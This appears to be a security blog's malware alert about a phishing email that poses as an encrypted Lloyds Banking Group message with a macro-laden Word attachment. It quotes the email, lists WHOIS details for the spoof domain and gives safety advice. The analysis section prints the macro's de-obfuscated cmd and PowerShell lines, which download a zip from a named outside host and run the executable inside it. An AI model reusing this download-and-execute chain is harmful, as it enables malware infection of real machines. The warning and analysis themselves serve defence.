An email with the subject of Lloyds Banking Group encrypted email pretending to come from GRP Lloydsbank Tech <[email protected]> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking Trojans like Dridex or Dyreza and ransomware like Locky or numerous Cryptolocker versions.

They are using email addresses and subjects that will scare or entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers.

Lloyds Bank has not been hacked or had their email or other servers compromised. They are not sending the emails to you. They are just innocent victims in exactly the same way as every recipient of these emails. However these emails ARE coming from the fake Lloyds bank address listed in the email [email protected]

A little bit of digging around tells us that lloydsbanking52.us was registered about 2 weeks ago on Fri Aug 26 11:39:11 GMT 2021 by:

Registrant Name:                             Ivan Nesterov
Registrant Address1:                         Plehanova st. 12 77
Registrant City:                             Odessa
Registrant State/Province:                   Odesskaya
Registrant Postal Code:                      43953
Registrant Country:                          Ukraine
Registrant Country Code:                     UA
Registrant Phone Number:                     +1.52314258
Registrant Email:                            [email protected]

which might or might not be false details.

What I can say with 100% certainty is that the Registrar is Namecheap . They should be more careful with registering domains that can me easily used in Malware or phishing.

lloydsbanking52.us is hosted on 194.15.113.180 justhost.in.ua
Lloyds Bank along with all other banks do not send encrypted messages by email, whether in Word format, PDF format or any other format.

The email looks like:

From: GRP Lloydsbank Tech <[email protected]>

Date: Thu 08/09/2021 15:03

Subject: Lloyds Banking Group encrypted email

Attachment: PGPMessage04834838.doc

Body Content:

You have received an encrypted email:

From: GRP Lloydslink Tech

To read the email, open the attached encrypted file and follow the instructions when requested.

You can send a secure reply by clicking the “Reply Securely” button from within the file, or by going directly to the Lloyds Banking Group Email Protection portal. You can send secure emails directly from the portal if you wish.

Lloyds Banking Group takes online security very seriously. If you have any questions or concerns about this email, please contact the sender, or your normal Lloyds Banking Group contact directly and they will be happy to answer any questions you may have. Alternatively you can refer to the Secure Email User Guide for further guidance.

Lloyds Banking Group plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC95000. Telephone: 0131 225 4555. Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales no. 2065. Telephone 0207626 1500. Bank of Scotland plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC327000. Telephone: 03457 801 801. Cheltenham & Gloucester plc. Registered Office: Barnett Way, Gloucester GL4 3RL. Registered in England and Wales 2299428. Telephone: 0345 603 1637

Lloyds Bank plc, Bank of Scotland plc are authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and Prudential Regulation Authority.

Cheltenham & Gloucester plc is authorised and regulated by the Financial Conduct Authority.

Halifax is a division of Bank of Scotland plc. Cheltenham & Gloucester Savings is a division of Lloyds Bank plc.

HBOS plc. Registered Office: The Mound, Edinburgh EH1 1YZ. Registered in Scotland no. SC218813.

This e-mail (including any attachments) is private and confidential and may contain privileged material. If you have received this e-mail in error, please notify the sender and delete it (including any attachments) immediately. You must not copy, distribute, disclose or use any of the information in it or any attachments. Telephone calls may be monitored or recorded.

Screenshot:

The word doc attached looks like this ( if you have protected view enabled & don’t enable macros)

8 September 2021: PGPMessage04834838.doc Current Virus total detections: Payload Security didn’t find any sites to download the malware but a manual analysis & de-obfuscation of the macro you can see here original on Pastebin shows a download from http://aclawgroup.com.au/2.zip which gives 2.exe ( VirusTotal) Payload Security which doesn’t give me a clue what is it or does, except that it is nasty. The file pretends to be netlimiter 4.0 but I really don’t think it is.

Update: I am being told it is a smoke loader AKA (https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/) Dofoil which will eventually download another banking Trojan

You can see why Payload Security ( and probably other sandboxes have problems with downloading the files . Powershell is a blessing for system administrators and makes everyday tasks so easy to do but also a major problem and allows malware developers to bypass lots of security settings on a computer and can hide what it is doing.

WINWORD.EXE /n “C:\5812d3933ee62d52d3cf540b00751bec5d54182b5a4e9231b60b3f469451f8c9.doc” (PID: 2556) cmd.exe /c mkdir “%APPDATA%\WndUpdate\” (PID: 3780) 
cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile(‘http://aclawgroup.com.au/2.zip’,’%APPDATA%\WndUpdate\2.exe.zip’); (new-object -com shell.application).namespace(‘%APPDATA%\WndUpdate\’).CopyHere((new-object -com shell.application).namespace(‘%APPDATA%\WndUpdate\2.exe.zip’).Items(),16) (PID: 3876) 
cmd.exe /c start “” “%APPDATA%\WndUpdate\2.exe” (PID: 936) 

Previous campaigns over the last few weeks have delivered numerous different download sites and malware versions. There are frequently 5 or 6 and even up to 150 download locations on some days, sometimes delivering the exactly same malware from all locations and sometimes slightly different malware versions. Dridex /Locky does update at frequent intervals during the day, sometimes as quickly as every hour, so you might get a different version of these nasty Ransomware or Banking password stealer Trojans.

All the alleged senders, companies, names of employees, phone numbers, amounts, reference numbers etc. mentioned in the emails are all innocent and are just picked at random. Some of these companies will exist and some won’t. Don’t try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found . The bad guys choose companies, Government departments and other organisations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.

This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you.

Modern versions of Microsoft office, that is Office 2010, 2013, 2016 and Office 365 should be automatically set to higher security to protect you.

By default protected view (https://support.office.com/en-gb/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653) is enabled and macros are disabled, UNLESS you or your company have enabled them. If protected view (https://support.office.com/en-gb/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653) mode is turned off and macros are enabled then opening this malicious word document will infect you, and simply previewing it in windows explorer or your email client might well be enough to infect you. Definitely DO NOT follow the advice they give to enable macros or enable editing to see the content.

Most of these malicious word documents either appear to be totally blank or look something like these images when opened in protected view (https://support.office.com/en-gb/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653) mode, which should be the default in Office 2010, 2013, 2016 and 365. Some versions pretend to have a digital RSA key and say you need to enable editing and Macros to see the content. Do NOT enable Macros or editing under any circumstances.

What Can Be Infected By This

At this time, these malicious macros only infect windows computers. They do not affect a Mac, IPhone, IPad, Blackberry, Windows phone or Android phone.

The malicious word or excel file can open on any device with an office program installed, and potentially the macro will run on Windows or Mac or any other device with Microsoft Office installed. BUT the downloaded malware that the macro tries to download is windows specific, so will not harm, install or infect any other computer except a windows computer. You will not be infected if you do not have macros enabled in Excel or Word. These Macros do not run in “Office Online” (https://products.office.com/en-gb/office-online/documents-spreadsheets-presentations-office-online) Open Office, Libre Office, Word Perfect or any other office program that can read Word or Excel files.

Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware. Also please read our post about word macro malware and how to avoid being infected by them

Be very careful with email attachments. All of these emails use Social engineering (https://en.wikipedia.org/wiki/Social_engineering_(security)) tricks to persuade you to open the attachments that come with the email. It might be a simple message saying “look at this picture of me I took last night” that appears to come from a friend. It might be a scare ware message that will make you open the attachment to see what you are accused of doing. Frequently it is more targeted at somebody ( small companies etc.) who regularly receive PDF attachments or Word .doc attachments or any other common file that you use every day, for example an invoice addressed to [email protected].

The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them. Our friends and family love to send us pictures of them doing silly things, or even cute pictures of the children or pets. Many of us routinely get Word, Excel or PowerPoint attachments in the course of work or from companies that we already have a relationship with.

Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. A lot of malicious files that are attached to emails will have a faked extension. That is the 3 letters at the end of the file name.

Unfortunately windows by default hides the file extensions so you need to Set your folder options to “show known file types. Then when you unzip the zip file that is supposed to contain the pictures of “Sally’s dog catching a ball”, an invoice or receipt from some company for a product or service or receive a Word doc or Excel file report that work has supposedly sent you to finish working on at the weekend, you can easily see if it is a picture or document & not a malicious program. If you see .EXE .COM .PIF .SCR .JS .HTA at the end of the file name DO NOT click on it or try to open it, it will infect you.

With these malformed infected word, excel and other office documents that normally contain a vba macro virus, the vital thing is do not open any office document direct from your email client or the web. Always save the document to a safe location on your computer, normally your downloads folder or your documents folder and scan it with your antivirus.

Many Antiviruses do not natively detect vba macro-viruses in real time protection and you need to enable document or office protection in the settings. Do not rely on your Anti-Virus to immediately detect the malware or malicious content. DO NOT enable editing mode or enable macros

All modern versions of word and other office programs, that is 2010, 2013, 2016 and 365, should open all Microsoft office documents that is word docs, excel files and PowerPoint etc that are downloaded from the web or received in an email automatically in “protected view” (https://support.office.com/en-gb/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653) that stops any embedded malware or macros from being displayed and running.

Make sure protected view is set in all office programs to protect you and your company from these sorts of attacks and do not over ride it to edit the document until you are 100% sure that it is a safe document. If the protected mode bar appears when opening the document DO NOT enable editing mode or enable macros the document will look blank or have a warning message, but will be safe.

Be aware that there are a lot of dodgy word docs spreading that WILL infect you with no action from you if you are still using an out dated or vulnerable version of word. This is a good reason to update your office programs to a recent version and stop using office 2003 and 2007.

Many of us have continued to use older versions of word and other office programs, because they are convenient, have the functions and settings we are used to and have never seen a need to update to the latest super-duper version. The risks in using older version are now seriously starting to outweigh the convenience, benefits and cost of keeping an old version going.

I strongly urge you to update your office software to the latest version and stop putting yourself at risk, using old out of date software.